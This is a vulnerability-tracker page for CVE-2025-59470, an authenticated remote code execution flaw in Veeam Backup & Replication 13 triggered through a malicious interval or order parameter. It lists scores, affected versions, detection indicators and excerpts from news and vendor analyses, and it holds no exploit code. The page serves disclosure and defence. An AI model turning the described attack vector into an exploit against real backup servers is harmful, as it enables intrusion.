CVE-2025-59470
published 2026-01-08CVE-2025-59470: This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
PriorityP261critical9CVSS 3.1
AVNACLPRHUINSCCHIHAL
EPSS
1.49%
70.8th percentile
This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| veeam | backup_and_recovery | 13.0.0 – 13.0.0 | — |
| veeam | veeam_backup_replication | >= 13.0.0.4967 < 13.0.1.1071 | 13.0.1.1071 |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit targets Veeam Backup & Replication version 13.0.1.180 and all earlier version 13 builds; presence of this version on a host indicates a vulnerable target ↗
- →Exploitation requires the attacker to hold the Backup Operator or Tape Operator role; monitor for unexpected privilege assignments to these roles in Veeam ↗
- →Successful exploitation results in code execution as the postgres OS/DB user; alert on unexpected processes or commands spawned by the postgres user on Veeam backup servers ↗
- →Attack vector involves sending a malicious interval or order parameter to the Veeam service; inspect API/network traffic to Veeam for anomalous or unsanitized interval/order parameter values ↗
- ·Exploitability is limited to authenticated users holding the Backup or Tape Operator roles, which Veeam considers highly privileged; unauthenticated exploitation is not possible ↗
- ·Following Veeam's recommended Security Guidelines reduces exploitability; patched version 13.0.1.1071 (released January 6) fully remediates the vulnerability ↗
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
Bleepingcomputer
New Veeam vulnerabilities expose backup servers to RCE attacks
blogs_bleepingcomputer·2026-01-07·CVSS 7.8
CVE-2025-59470 [HIGH] New Veeam vulnerabilities expose backup servers to RCE attacks
## New Veeam vulnerabilities expose backup servers to RCE attacks
## Sergiu Gatlan
Veeam released security updates to patch multiple security flaws in its Backup & Replication software, including a critical remote code execution (RCE) vulnerability.
Tracked as CVE-2025-59470, this RCE security flaw affects Veeam Backup & Replication 13.0.1.180 and all earlier version 13 builds.
"This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter," Veeam explained in a Tuesday advisory.
However, the information technology company adjusted its rating to high severity because it can only be exploited by attackers with the Backup or Tape Operator roles.
"The Backup and Tape Operator roles are c
Wiz
CVE-2025-59470 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.0
CVE-2025-59470 [CRITICAL] CVE-2025-59470 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59470 :
Veeam Backup & Replication vulnerability analysis and mitigation
This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter.
Source : NVD
## 9
Score
Published January 8, 2026
Severity CRITICAL
CNA Score 9.0
Affected Technologies
Veeam Backup & Replication
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 37.8
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
cpe:2.3:a:veeam:veeam_backup_\&_replication
Sources
Windows Severity CRITICAL Has Fix Added at: Jan 11, 2026
Windows Severity CRITICAL Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessmen
2026-01-08
Published